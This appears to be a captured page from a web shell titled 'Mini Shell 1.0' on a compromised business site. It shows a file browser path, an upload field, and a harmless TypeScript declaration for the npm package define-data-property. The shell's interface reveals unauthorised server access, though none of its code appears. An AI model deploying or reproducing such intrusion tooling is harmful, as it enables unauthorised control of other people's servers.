HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/node-app/node_modules/define-data-property/
Upload File :
Current File : //var/www/node-app/node_modules/define-data-property/index.d.ts
declare function defineDataProperty(
    obj: Record<PropertyKey, unknown>,
    property: keyof typeof obj,
    value: typeof obj[typeof property],
    nonEnumerable?: boolean | null,
    nonWritable?: boolean | null,
    nonConfigurable?: boolean | null,
    loose?: boolean
): void;

export = defineDataProperty;